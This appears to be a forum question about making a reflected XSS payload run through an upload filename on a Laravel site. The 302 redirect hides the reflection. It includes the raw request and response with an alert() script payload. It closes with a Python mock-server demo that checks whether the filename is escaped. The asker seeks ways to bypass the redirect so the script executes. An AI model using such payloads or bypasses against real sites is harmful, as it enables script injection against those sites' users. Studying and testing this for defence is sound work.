In some basic steps:
- POST request containing a photo with multipart/form-data.
- HTTP/1.1 302 Found response with a redirect back to the form.
- Redirect to the initial form.
In case 1 we are able to control the filename, allowing us to use any kind of payload we want.
In case 2 we are able to see the XSS payload in the response, but there is no execution (let the fun begin) because of the Location header.
In case 3 we see the file name, which is a Laravel-encoded response... => no XSS.
Explained:
Step 1:
POST /upload/file HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: https://example.com/upload
Content-Type: multipart/form-data; boundary=---------------------------172863706614177227892012498540
Content-Length: 8331
Cookie: laravel_session=not_your_problem
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------172863706614177227892012498540
Content-Disposition: form-data; name="doc_1"; filename="<!DOCTYPE html><script>alert('XSS'); .png"
Content-Type: image/png
Step 2:
HTTP/1.1 302 Found
Server: nginx/1.12.2
Content-Type: text/html; charset=UTF-8
Connection: close
Cache-Control: no-cache
Location: https://example.com/upload
Date: Tue, 08 May 2018 12:49:50 GMT
Set-Cookie: laravel_session=laravel_session=not_your_problem; path=/
Strict-Transport-Security: max-age=31536000
Content-Length: 535

adding: <!DOCTYPE html><script>alert('XSS'); .png (deflated 14%)
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8" />
<meta http-equiv="refresh" content="1;url=https://example.com/upload" />
From what I know of the Laravel framework, it and other websites, applications and so on add a content-based redirect (even if there is a header one like Location) for extra redundancy, like <meta http-equiv="refresh" content="1;url=something">.
In what circumstances, and how, might I be able to bypass the Location header in order to execute my content and therefore my XSS?
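Added example (not part of the original question, and not Laravel code): the exchange above reproduced in-process so the reflection can be checked without a browser. MockUploadHandler is a hypothetical stand-in for the upload endpoint; it answers the multipart POST with 302 Found, the observed Location header, and an HTML body that echoes the submitted filename, either raw (as seen in the question) or HTML-escaped (the hardened variant). The client uses http.client, which never follows redirects, so the 302 body is actually read and inspected. The PNG bytes and the boundary are constructed sample input.

```python
import html
import re
import threading
from http.client import HTTPConnection
from http.server import BaseHTTPRequestHandler, HTTPServer

# Filename payload exactly as submitted in the original request.
PAYLOAD = "<!DOCTYPE html><script>alert('XSS'); .png"
# Value of the Location header seen in the original 302 response.
REDIRECT_TARGET = "https://example.com/upload"


class MockUploadHandler(BaseHTTPRequestHandler):
    """Hypothetical stand-in for the upload endpoint (assumption, not the
    real application). Every POST gets a 302 Found with a Location header
    and an HTML body that echoes the uploaded filename."""
    escape_output = False  # False: reflect raw (vulnerable); True: hardened

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        body = self.rfile.read(length)
        # Minimal multipart handling: pull the filename out of the part header.
        m = re.search(rb'filename="([^"]*)"', body)
        name = m.group(1).decode("utf-8", "replace") if m else ""
        shown = html.escape(name, quote=True) if self.escape_output else name
        page = (
            '<!DOCTYPE html><html><head><meta charset="UTF-8" />'
            f'<meta http-equiv="refresh" content="1;url={REDIRECT_TARGET}" />'
            f"</head><body>adding: {shown} (deflated 14%)</body></html>"
        ).encode()
        self.send_response(302)
        self.send_header("Content-Type", "text/html; charset=UTF-8")
        self.send_header("Location", REDIRECT_TARGET)
        self.send_header("Content-Length", str(len(page)))
        self.end_headers()
        self.wfile.write(page)

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_mock_server(escape_output):
    """Start a mock upload server on a free loopback port in a daemon thread."""
    handler = type("Handler", (MockUploadHandler,), {"escape_output": escape_output})
    server = HTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def build_multipart(field, filename, content, boundary):
    """Build a single-part multipart/form-data body with the given filename."""
    return (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        "Content-Type: image/png\r\n\r\n"
    ).encode() + content + f"\r\n--{boundary}--\r\n".encode()


def upload_and_inspect(port, filename):
    """POST the upload and inspect the 302 body without following the redirect."""
    boundary = "---------------------------172863706614177227892012498540"
    body = build_multipart("doc_1", filename, b"\x89PNG\r\n\x1a\n", boundary)
    conn = HTTPConnection("127.0.0.1", port)
    conn.request("POST", "/upload/file", body, {
        "Content-Type": f"multipart/form-data; boundary={boundary}",
        "Content-Length": str(len(body)),
    })
    resp = conn.getresponse()  # http.client never follows redirects
    page = resp.read().decode()
    conn.close()
    return {
        "status": resp.status,
        "location": resp.getheader("Location"),
        "reflected_raw": filename in page,                            # unescaped echo
        "reflected_escaped": html.escape(filename, quote=True) in page,  # escaped echo
    }


def run_demo():
    """Run the upload against the vulnerable and the hardened mock server."""
    results = {}
    for label, escape in (("vulnerable", False), ("hardened", True)):
        server = start_mock_server(escape)
        try:
            results[label] = upload_and_inspect(server.server_address[1], PAYLOAD)
        finally:
            server.shutdown()
            server.server_close()
    return results


if __name__ == "__main__":
    for label, result in run_demo().items():
        print(label, result)
```

The "vulnerable" result shows status 302, the Location header, and reflected_raw True: the payload is in the response body exactly as the question describes, while a browser would follow Location and never render that body. The "hardened" result has reflected_raw False and reflected_escaped True, which is the check to run against the real endpoint to see whether the filename is escaped in the body at all, independent of whether the redirect gets in the way.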